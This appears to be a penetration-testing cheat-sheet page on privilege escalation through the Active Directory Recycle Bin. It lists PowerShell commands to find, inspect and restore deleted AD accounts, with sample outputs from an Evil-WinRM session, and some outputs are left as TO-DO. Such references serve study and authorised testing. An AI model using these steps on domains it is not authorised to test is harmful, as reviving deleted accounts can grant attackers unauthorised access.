TLDRBins TLDRBins / AD Recycle Bin

Usage Tips:

  • Click on a keyword to enable inline editing.
  • Click inside a code block to copy (excludes comments).
  • Use the button to view examples.
  • Click outside to collapse all examples.

Privesc #1: Restore Deleted AD Object

1. Import AD Module

Import-Module activedirectory

Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> import-module activedirectory

2. Query All Deleted Objects within Domain

Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects

Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> Get-ADObject -filter 'isDeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects

Deleted           : True
DistinguishedName : CN=Another User\0ADEL:ebe15df5-e265-45ec-b7fc-359877217138,CN=Deleted Objects,DC=example,DC=com
Name              : Another User
                    DEL:ebe15df5-e265-45ec-b7fc-359877217138
ObjectClass       : user
ObjectGUID        : ebe15df5-e265-45ec-b7fc-359877217138

3. Get All Details for the Deleted Object

Get-ADObject -filter { SAMAccountName -eq '<DELETED_USER>' } -includeDeletedObjects -property *

Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> Get-ADObject -filter { SAMAccountName -eq 'another.user' }
-includeDeletedObjects -property *


accountExpires                  : 9223372036854775807
badPasswordTime                 : 0
badPwdCount                     : 0
CanonicalName                   : example.com/Deleted Objects/Another User
                                  DEL:ebe15df5-e265-45ec-b7fc-359877217138
CN                              : Another User
                                  DEL:ebe15df5-e265-45ec-b7fc-359877217138
---[SNIP]---

4. Restore the Deleted Object

# Rename the target account to avoid user exists error
Restore-ADObject -Identity <OBJECT_GUID> -NewName '<DELETED_USER>.2' -TargetPath 'CN=Users,DC=<EXAMPLE>,DC=<COM>'

Sample Output:
*Evil-WinRM* PS C:\Users\test.user\Documents> Restore-ADObject -Identity ebe15df5-e265-45ec-b7fc-359877217138 -NewName 'Another User2' -TargetPath 'CN=Users,DC=EXAMPLE,DC=COM'

# Or
Restore-ADObject -Identity "<DISTINGUISHED_NAME>"

Sample Output:
TO-DO
PS C:\programdata> Restore-ADObject -Identity "CN=Apple Seed\0ADEL:1c6---[SNIP]---9db,CN=Deleted Objects,DC=example,DC=com"
Restore-ADObject -Identity "CN=Apple Seed\0ADEL:1c6---[SNIP]---9db,CN=Deleted Objects,DC=example,DC=com"

Sample Output:
TO-DO

5. Check

net user <DELETED_USER>

Sample Output:
TO-DO